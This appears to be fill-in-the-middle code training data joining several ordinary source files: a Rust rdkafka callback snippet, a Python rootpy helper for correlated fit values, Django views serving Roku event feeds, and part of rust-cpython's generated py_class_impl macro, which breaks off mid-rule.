// double indirection is required because `&dyn Fn` is a fat pointer.
unsafe extern "C" fn native_message_queue_nonempty_cb(
_: *mut RDKafka,
opaque_ptr: *mut c_void,
) {
let f = opaque_ptr as *const *const (dyn Fn() + Send + Sync);
(**f)();
}
let f: Box<Box<dyn Fn() + Send + Sync>> = Box::new(Box::new(f));
unsafe {
rdsys::rd_kafka_queue_cb_event_enable(
self.queue.ptr(),
Some(native_message_queue_nonempty_cb),
&*f as *const _ as *mut c_void,
)
}
self.nonempty_callback = Some(f);
}
}
impl<C> Drop for PartitionQueue<C>
where
C: ConsumerContext,
{
fn drop(&mut self) {
unsafe { rdsys::rd_kafka_queue_cb_event_enable(self.queue.ptr(), None, ptr::null_mut()) }
}
}<|fim▁end|>
|
/// ```rust,no_run
/// # let consumer: rdkafka::consumer::BaseConsumer<_> = rdkafka::ClientConfig::new()
|
<|file_name|>correlated_values.py<|end_file_name|><|fim▁begin|>from __future__ import absolute_import
import uncertainties as U
from .. import asrootpy
__all__ = [
'as_ufloat',
'correlated_values',
]
def as_ufloat(roorealvar):
"""
Cast a `RooRealVar` to an `uncertainties.ufloat`
"""
if isinstance(roorealvar, (U.AffineScalarFunc, U.Variable)):
return roorealvar
return U.ufloat((roorealvar.getVal(), roorealvar.getError()))
def correlated_values(param_names, roofitresult):
"""
Return symbolic values from a `RooFitResult` taking into account covariance
This is useful for numerically computing the uncertainties for expressions
using correlated values arising from a fit.
Parameters
----------
param_names: list of strings
A list of parameters to extract from the result. The order of the names
is the order of the return value.
roofitresult : RooFitResult
A RooFitResult from a fit.
Returns
-------
list of correlated values from the uncertainties package.
Examples
--------
.. sourcecode:: python
# Fit a pdf to a histogram
pdf = some_roofit_pdf_with_variables("f(x, a, b, c)")
fitresult = pdf.fitTo(histogram, ROOT.RooFit.Save())
a, b, c = correlated_values(["a", "b", "c"], fitresult)
# Arbitrary math expression according to what the `uncertainties`
# package supports, automatically computes correct error propagation
sum_value = a + b + c
value, error = sum_value.nominal_value, sum_value.std_dev()
"""
pars = roofitresult.floatParsFinal()
#pars.Print()
pars = [pars[i] for i in range(pars.getSize())]<|fim▁hole|> parnames = [p.GetName() for p in pars]
values = [(p.getVal(), p.getError()) for p in pars]
#values = [as_ufloat(p) for p in pars]
matrix = asrootpy(roofitresult.correlationMatrix()).to_numpy()
uvalues = U.correlated_values_norm(values, matrix.tolist())
uvalues = dict((n, v) for n, v in zip(parnames, uvalues))
assert all(n in uvalues for n in parnames), (
"name {0} isn't in parameter list {1}".format(n, parnames))
# Return a tuple in the order it was asked for
return tuple(uvalues[n] for n in param_names)<|fim▁end|>
| |
<|file_name|>views.py<|end_file_name|><|fim▁begin|>from django.contrib.sites.models import RequestSite
from django.shortcuts import render
from django.conf import settings
from django.db.models import Q
from django.core.urlresolvers import reverse<|fim▁hole|>from airmozilla.main.models import Channel, Event
from airmozilla.main.views import is_contributor
from airmozilla.base.utils import (
paginate
)
from airmozilla.main.context_processors import get_featured_events
def categories_feed(request):
context = {}
privacy_filter = {}
privacy_exclude = {}
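    # Contributors must not see company-private events; anonymous visitors
    # see only public events.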
if request.user.is_active:
if is_contributor(request.user):
# feed_privacy = 'contributors'
privacy_exclude = {'privacy': Event.PRIVACY_COMPANY}
# else:
# feed_privacy = 'company'
else:
privacy_filter = {'privacy': Event.PRIVACY_PUBLIC}
# feed_privacy = 'public'
events = Event.objects.scheduled().approved()
live_events = Event.objects.live().approved()
if privacy_filter:
events = events.filter(**privacy_filter)
live_events = live_events.filter(**privacy_filter)
elif privacy_exclude:
events = events.exclude(**privacy_exclude)
live_events = live_events.exclude(**privacy_exclude)
channels = get_channels(events)
context['channels'] = channels
context['live_events'] = live_events
prefix = request.is_secure() and 'https' or 'http'
root_url = '%s://%s' % (prefix, RequestSite(request).domain)
def abs_url_maker(viewname, *args, **kwargs):
return root_url + reverse(viewname, args=args, kwargs=kwargs)
context['abs_url'] = abs_url_maker
context['get_media_info'] = get_media_info
response = render(request, 'roku/categories.xml', context)
response['Content-Type'] = 'text/xml'
return response
def get_channels(events, parent=None):
channels = []
channels_qs = Channel.objects.all()
if parent is None:
channels_qs = channels_qs.filter(parent__isnull=True)
else:
channels_qs = channels_qs.filter(parent=parent)
for channel in channels_qs:
event_count = events.filter(channels=channel).count()
subchannel_count = Channel.objects.filter(parent=channel).count()
if event_count or subchannel_count:
# channel.subchannels = get_channels(events, parent=channel)
channels.append(channel)
def sorter(x, y):
        if x.slug == settings.DEFAULT_CHANNEL_SLUG:
            return -2
        if y.slug == settings.DEFAULT_CHANNEL_SLUG:
            return 2
        return cmp(x.name.lower(), y.name.lower())
channels.sort(sorter)
return channels
def get_media_info(event):
if event.template and 'vid.ly' in event.template.name.lower():
tag = event.template_environment['tag']
return {
# 'url': 'http://vid.ly/%s?content=video&format=webm' % tag,
# 'format': 'webm'
# NOTE that it's deliberately set to the HTTP URL. Not HTTPS :(
'url': 'http://vid.ly/%s?content=video&format=mp4' % tag,
'format': 'mp4'
}
elif event.template and 'hls' in event.template.name.lower():
try:
file = event.template_environment['file']
wowzaapp = event.template_environment.get('wowzaapp') or 'Edgecast'
return {
# it's important to use HTTP here :(
'url': (
'http://wowza1.cdn.mozilla.net/%s/ngrp:%s_all'
'/playlist.m3u8' % (wowzaapp, file)
),
'format': 'hls',
}
except KeyError:
pass
return None
def event_feed(request, id):
# return a feed containing exactly only one event
context = {}
events = Event.objects.filter(id=id)
context['events'] = events
context['get_media_info'] = get_media_info
response = render(request, 'roku/channel.xml', context)
response['Content-Type'] = 'text/xml'
return response
def channel_feed(request, slug):
# this slug might be the slug of a parent
channels = Channel.objects.filter(
Q(slug=slug) |
Q(parent__slug=slug)
)
events = Event.objects.archived().approved()
events = events.filter(channels__in=channels)
privacy_filter = {}
privacy_exclude = {}
if request.user.is_active:
if is_contributor(request.user):
privacy_exclude = {'privacy': Event.PRIVACY_COMPANY}
else:
privacy_filter = {'privacy': Event.PRIVACY_PUBLIC}
if privacy_filter:
events = events.filter(**privacy_filter)
elif privacy_exclude:
events = events.exclude(**privacy_exclude)
events = events.order_by('-start_time')
paged = paginate(events, 1, 100)
return render_channel_events(paged, request)
def trending_feed(request):
events = get_featured_events(
None, # across all channels
request.user,
length=settings.TRENDING_ROKU_COUNT,
)
return render_channel_events(events, request)
def render_channel_events(events, request):
context = {}
context['events'] = events
context['get_media_info'] = get_media_info
response = render(request, 'roku/channel.xml', context)
response['Content-Type'] = 'text/xml'
return response<|fim▁end|>
| |
<|file_name|>py_class_impl3.rs<|end_file_name|><|fim▁begin|>// Copyright (c) 2016-2021 Daniel Grunwald
//
// Permission is hereby granted, free of charge, to any person obtaining a copy of this
// software and associated documentation files (the "Software"), to deal in the Software
// without restriction, including without limitation the rights to use, copy, modify, merge,
// publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons
// to whom the Software is furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in all copies or
// substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
// INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
// PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
// FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
// OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
// DEALINGS IN THE SOFTWARE.
// !!!!!!!!!!!!!!!!!!!!!!!!!!!
// THIS IS A GENERATED FILE !!
// DO NOT MODIFY !!
// !!!!!!!!!!!!!!!!!!!!!!!!!!!
//
// REGENERATE USING THE MAKEFILE IN ROOT OF REPOSITORY: make build
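//
// Editorial sketch, not part of the generated output: `py_class_impl!` is the
// TT-muncher back-end behind the user-facing `py_class!` macro. A minimal
// invocation that exercises the `data` and `def` rules below might look like
// this (the class name, field name, and method body are illustrative only):
//
//     py_class!(class MyType |py| {
//         data number: i32;
//         def __abs__(&self) -> PyResult<i32> {
//             Ok(self.number(py).abs())
//         }
//     });
//
// Each `data ...;` or `def ...` item is consumed by one of the rules below,
// which accumulate type slots and impl items and recurse on the remaining
// tokens until the empty-input base case emits the final struct, trait impls,
// and type-object initialization code.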
#[macro_export]
#[doc(hidden)]
macro_rules! py_class_impl {
    // TT muncher macro. Results are accumulated in $info, $slots, $impls, and $members.
// Base case: we're done munching and can start producing code:
{ {}
$class:ident $py:ident
/* info: */ {
$base_type:ty,
$size:expr,
{ $( $class_visibility:tt )* },
$gc:tt,
/* data: */ [ $( { $data_offset:expr, $data_name:ident, $data_ty:ty, $init_expr:expr, $init_ty:ty } )* ]
}
$slots:tt { $( $imp:item )* } $members:tt $props:tt
} => {
$crate::py_coerce_item! {
$($class_visibility)* struct $class { _unsafe_inner: $crate::PyObject }
}
$crate::py_impl_to_py_object_for_python_object!($class);
$crate::py_impl_from_py_object_for_python_object!($class);
impl $crate::PythonObject for $class {
#[inline]
fn as_object(&self) -> &$crate::PyObject {
&self._unsafe_inner
}
#[inline]
fn into_object(self) -> $crate::PyObject {
self._unsafe_inner
}
/// Unchecked downcast from PyObject to Self.
/// Undefined behavior if the input object does not have the expected type.
#[inline]
unsafe fn unchecked_downcast_from(obj: $crate::PyObject) -> Self {
$class { _unsafe_inner: obj }
}
/// Unchecked downcast from PyObject to Self.
/// Undefined behavior if the input object does not have the expected type.
#[inline]
unsafe fn unchecked_downcast_borrow_from<'a>(obj: &'a $crate::PyObject) -> &'a Self {
std::mem::transmute(obj)
}
}
impl $crate::PythonObjectWithCheckedDowncast for $class {
#[inline]
fn downcast_from<'p>(py: $crate::Python<'p>, obj: $crate::PyObject) -> Result<$class, $crate::PythonObjectDowncastError<'p>> {
if py.get_type::<$class>().is_instance(py, &obj) {
Ok($class { _unsafe_inner: obj })
} else {
Err($crate::PythonObjectDowncastError::new(
py,
stringify!($class),
obj.get_type(py),
))
}
}
#[inline]
fn downcast_borrow_from<'a, 'p>(py: $crate::Python<'p>, obj: &'a $crate::PyObject) -> Result<&'a $class, $crate::PythonObjectDowncastError<'p>> {
if py.get_type::<$class>().is_instance(py, obj) {
unsafe { Ok(std::mem::transmute(obj)) }
} else {
Err($crate::PythonObjectDowncastError::new(
py,
stringify!($class),
obj.get_type(py),
))
}
}
}
$crate::py_coerce_item! {
impl $crate::py_class::BaseObject for $class {
type InitType = ( $( $init_ty, )* );
#[inline]
fn size() -> usize {
$size
}
unsafe fn alloc(
py: $crate::Python,
ty: &$crate::PyType,
( $( $data_name, )* ): Self::InitType
) -> $crate::PyResult<$crate::PyObject>
{
let obj = <$base_type as $crate::py_class::BaseObject>::alloc(py, ty, ())?;
$( $crate::py_class::data_init::<$data_ty>(py, &obj, $data_offset, $init_expr); )*
Ok(obj)
}
unsafe fn dealloc(py: $crate::Python, obj: *mut $crate::_detail::ffi::PyObject) {
$( $crate::py_class::data_drop::<$data_ty>(py, obj, $data_offset); )*
<$base_type as $crate::py_class::BaseObject>::dealloc(py, obj)
}
}
}
$($imp)*
$crate::py_coerce_item! {
impl $class {
$($class_visibility)* fn create_instance(py: $crate::Python $( , $data_name : $init_ty )* ) -> $crate::PyResult<$class> {
let obj = unsafe {
<$class as $crate::py_class::BaseObject>::alloc(
py, &py.get_type::<$class>(), ( $($data_name,)* )
)
}?;
return Ok($class { _unsafe_inner: obj });
// hide statics in create_instance to avoid name conflicts
static mut TYPE_OBJECT : $crate::_detail::ffi::PyTypeObject
= $crate::py_class_type_object_static_init!($class, $gc, $slots);
static mut INIT_ACTIVE: bool = false;
// trait implementations that need direct access to TYPE_OBJECT
impl $crate::PythonObjectWithTypeObject for $class {
fn type_object(py: $crate::Python) -> $crate::PyType {
unsafe {
if $crate::py_class::is_ready(py, &TYPE_OBJECT) {
$crate::PyType::from_type_ptr(py, &mut TYPE_OBJECT)
} else {
// automatically initialize the class on-demand
<$class as $crate::py_class::PythonObjectFromPyClassMacro>::initialize(py, None)
.expect(concat!("An error occurred while initializing class ", stringify!($class)))
}
}
}
}
impl $crate::py_class::PythonObjectFromPyClassMacro for $class {
fn initialize(py: $crate::Python, module_name: Option<&str>) -> $crate::PyResult<$crate::PyType> {
unsafe {
if $crate::py_class::is_ready(py, &TYPE_OBJECT) {
return Ok($crate::PyType::from_type_ptr(py, &mut TYPE_OBJECT));
}
assert!(!INIT_ACTIVE,
concat!("Reentrancy detected: already initializing class ",
stringify!($class)));
INIT_ACTIVE = true;
let res = init(py, module_name);
INIT_ACTIVE = false;
res
}
}
fn add_to_module(py: $crate::Python, module: &$crate::PyModule) -> $crate::PyResult<()> {
let ty = <$class as $crate::py_class::PythonObjectFromPyClassMacro>::initialize(py, module.name(py).ok())?;
module.add(py, stringify!($class), ty)
}
}
fn init($py: $crate::Python, module_name: Option<&str>) -> $crate::PyResult<$crate::PyType> {
$crate::py_class_type_object_dynamic_init!($class, $py, TYPE_OBJECT, module_name, $slots $props);
$crate::py_class_init_members!($class, $py, TYPE_OBJECT, $members);
unsafe {
if $crate::_detail::ffi::PyType_Ready(&mut TYPE_OBJECT) == 0 {
Ok($crate::PyType::from_type_ptr($py, &mut TYPE_OBJECT))
} else {
Err($crate::PyErr::fetch($py))
}
}
}
}
}
}
};
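    // `data $name: $ty;`: reserve inline storage behind the base object by
    // growing $size, record the field's byte offset, and generate an accessor
    // method `fn $name(&self, py)` returning a reference to the stored value.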
{ { data $data_name:ident : $data_type:ty; $($tail:tt)* }
$class:ident $py:ident
/* info: */ {
$base_type: ty,
$size: expr,
$class_visibility: tt,
$gc: tt,
[ $( $data:tt )* ]
}
$slots:tt
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py
/* info: */ {
$base_type,
/* size: */ $crate::py_class::data_new_size::<$data_type>($size),
$class_visibility,
$gc,
/* data: */ [
$($data)*
{
$crate::py_class::data_offset::<$data_type>($size),
$data_name,
$data_type,
/* init_expr: */ $data_name,
/* init_ty: */ $data_type
}
]
}
$slots
/* impl: */ {
$($imp)*
impl $class {
fn $data_name<'a>(&'a self, py: $crate::Python<'a>) -> &'a $data_type {
unsafe {
$crate::py_class::data_get::<$data_type>(
py,
&self._unsafe_inner,
$crate::py_class::data_offset::<$data_type>($size)
)
}
}
}
}
$members $props
}};
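    // `@shared data` variant: like `data`, but the field is stored in a
    // PySharedRefCell and the accessor hands out a PySharedRef, presumably so
    // the value can be mutably borrowed at runtime through the Python object.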
{ { @shared data $data_name:ident : $data_type:ty; $($tail:tt)* }
$class:ident $py:ident
/* info: */ {
$base_type: ty,
$size: expr,
$class_visibility: tt,
$gc: tt,
[ $( $data:tt )* ]
}
$slots:tt
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py
/* info: */ {
$base_type,
/* size: */ $crate::py_class::data_new_size::<$crate::PySharedRefCell<$data_type>>($size),
$class_visibility,
$gc,
/* data: */ [
$($data)*
{
$crate::py_class::data_offset::<$crate::PySharedRefCell<$data_type>>($size),
$data_name,
/* data_ty: */ $crate::PySharedRefCell<$data_type>,
/* init_expr: */ $crate::PySharedRefCell::<$data_type>::new($data_name),
/* init_ty: */ $data_type
}
]
}
$slots
/* impl: */ {
$($imp)*
impl $class {
fn $data_name<'a>(&'a self, py: $crate::Python<'a>) -> $crate::PySharedRef<'a, $data_type> {
unsafe {
let data = $crate::py_class::data_get::<$crate::PySharedRefCell<$data_type>>(
py,
&self._unsafe_inner,
$crate::py_class::data_offset::<$crate::PySharedRefCell<$data_type>>($size)
);
$crate::PySharedRef::new(py, &self._unsafe_inner, data)
}
}
}
}
$members $props
}};
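    // `def __traverse__(&self, visit)` installs the cyclic-GC traverse proc:
    // the rule swaps the `None` traverse_proc in the gc info for
    // `$class::__traverse__` and emits the method itself.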
{ { def __traverse__(&$slf:tt, $visit:ident) $body:block $($tail:tt)* }
$class:ident $py:ident
/* info: */ {
$base_type: ty,
$size: expr,
$class_visibility: tt,
/* gc: */ {
/* traverse_proc: */ None,
$traverse_data: tt
},
$datas: tt
}
$slots:tt
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py
/* info: */ {
$base_type,
$size,
$class_visibility,
/* gc: */ {
/* traverse_proc: */ $class::__traverse__,
$traverse_data
},
$datas
}
$slots
/* impl: */ {
$($imp)*
$crate::py_coerce_item!{
impl $class {
fn __traverse__(&$slf,
$py: $crate::Python,
$visit: $crate::py_class::gc::VisitProc)
-> Result<(), $crate::py_class::gc::TraverseError>
$body
}
}
}
$members $props
}};
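    // `def __clear__(&self)` fills the tp_clear type slot (via
    // py_class_tp_clear!) so the cyclic GC can break reference cycles
    // through instances of this class.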
{ { def __clear__ (&$slf:ident) $body:block $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_clear: $crate::py_class_tp_clear!($class),
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_coerce_item!{
impl $class {
fn __clear__(&$slf, $py: $crate::Python) $body
}
}
}
$members $props
}};
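    // Unary numeric operators such as __abs__ all follow the same pattern:
    // register an nb_* slot built with py_class_unary_slot! and emit the
    // method via py_class_impl_item!; a mismatched signature falls through to
    // the py_error! rule right after, producing a compile-time message.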
{ { def __abs__(&$slf:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_absolute: $crate::py_class_unary_slot!($class::__abs__, *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __abs__(&$slf,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { def __abs__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __abs__" }
};
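    // Binary numeric operators take two free arguments ($left, $right) instead
    // of &self, because Python may call the slot with the class on either
    // side; both operands are therefore bound as &PyObject.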
{ { def __add__($left:ident, $right:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_add: $crate::py_class_numeric_slot!(binary $class::__add__),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __add__() $res_type; { $($body)* } [ { $left : &$crate::PyObject = {} } { $right : &$crate::PyObject = {} } ] }
}
$members $props
}};
{ { def __add__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for binary numeric operator __add__" }
};
{ { def __aenter__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__aenter__ is not supported by py_class! yet." }
};
{ { def __aexit__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__aexit__ is not supported by py_class! yet." }
};
{ { def __aiter__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__aiter__ is not supported by py_class! yet." }
};
{ { def __and__($left:ident, $right:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_and: $crate::py_class_numeric_slot!(binary $class::__and__),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __and__() $res_type; { $($body)* } [ { $left : &$crate::PyObject = {} } { $right : &$crate::PyObject = {} } ] }
}
$members $props
}};
{ { def __and__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for binary numeric operator __and__" }
};
{ { def __await__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__await__ is not supported by py_class! yet." }
};
{ { def __bool__(&$slf:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_bool: $crate::py_class_unary_slot!($class::__bool__, $crate::_detail::libc::c_int, $crate::py_class::slots::BoolConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __bool__(&$slf,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { def __bool__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __bool__" }
};
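    // __call__ maps to the tp_call slot. Four rules follow: with or without
    // extra parameters, each optionally prefixed with a visibility token for
    // the generated method.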
{ { def __call__ (&$slf:ident) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_call: $crate::py_class_call_slot!{$class::__call__ []},
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __call__(&$slf,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { $visibility:vis def __call__ (&$slf:ident) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_call: $crate::py_class_call_slot!{$class::__call__ []},
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, $visibility, __call__(&$slf,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { def __call__ (&$slf:ident, $($p:tt)+) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_call: $crate::py_argparse_parse_plist_impl!{py_class_call_slot {$class::__call__} [] ($($p)+,)},
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_argparse_parse_plist_impl!{
py_class_impl_item { $class, $py, pub, __call__(&$slf,) $res_type; { $($body)* } }
[] ($($p)+,)
}
}
$members $props
}};
{ { $visibility:vis def __call__ (&$slf:ident, $($p:tt)+) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_call: $crate::py_argparse_parse_plist_impl!{py_class_call_slot {$class::__call__} [] ($($p)+,)},
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_argparse_parse_plist_impl!{
py_class_impl_item { $class, $py, $visibility, __call__(&$slf,) $res_type; { $($body)* } }
[] ($($p)+,)
}
}
$members $props
}};
{ { def __cmp__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__cmp__ is not supported by py_class! use __richcmp__ instead." }
};
{ { def __coerce__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__coerce__ is not supported by py_class! yet." }
};
{ { def __complex__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__complex__ is not supported by py_class! yet." }
};
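    // __contains__ fills the sq_contains slot. Note the three variants below,
    // accepting `Option<&T>`, `&T`, and by-value `T` parameters; the same
    // triple recurs for the other argument-taking slots in this file.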
{ { def __contains__(&$slf:ident, $item:ident : Option<&$item_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt $as_number:tt
/* as_sequence */ [ $( $sq_slot_name:ident : $sq_slot_value:expr, )* ]
$as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots $as_number
/* as_sequence */ [
$( $sq_slot_name : $sq_slot_value, )*
sq_contains: $crate::py_class_contains_slot!($class::__contains__, [Option<&$item_name>]),
]
$as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __contains__(&$slf,) $res_type; { $($body)* } [{ $item : Option<&$item_name> = {} }] }
}
$members $props
}};
{ { def __contains__(&$slf:ident, $item:ident : &$item_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt $as_number:tt
/* as_sequence */ [ $( $sq_slot_name:ident : $sq_slot_value:expr, )* ]
$as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots $as_number
/* as_sequence */ [
$( $sq_slot_name : $sq_slot_value, )*
sq_contains: $crate::py_class_contains_slot!($class::__contains__, [&$item_name]),
]
$as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __contains__(&$slf,) $res_type; { $($body)* } [{ $item : &$item_name = {} }] }
}
$members $props
}};
{ { def __contains__(&$slf:ident, $item:ident : $item_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt $as_number:tt
/* as_sequence */ [ $( $sq_slot_name:ident : $sq_slot_value:expr, )* ]
$as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots $as_number
/* as_sequence */ [
$( $sq_slot_name : $sq_slot_value, )*
sq_contains: $crate::py_class_contains_slot!($class::__contains__, [$item_name]),
]
$as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __contains__(&$slf,) $res_type; { $($body)* } [{ $item : $item_name = {} }] }
}
$members $props
}};
{ { def __contains__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __contains__" }
};
{ { def __del__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__del__ is not supported by py_class!; Use a data member with a Drop impl instead." }
};
{ { def __delattr__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__delattr__ is not supported by py_class! yet." }
};
{ { def __delete__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__delete__ is not supported by py_class! yet." }
};
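    // __delitem__ records its slot in the sdi_delitem half of the setdelitem
    // accumulator (and only matches while that half is still the empty `{}`);
    // set and delete are tracked separately here, presumably to be folded into
    // a single mapping-assignment slot later on.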
{ { def __delitem__(&$slf:ident, $key:ident : Option<&$key_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt $as_number:tt $as_sequence:tt $as_mapping:tt
/* setdelitem */ [
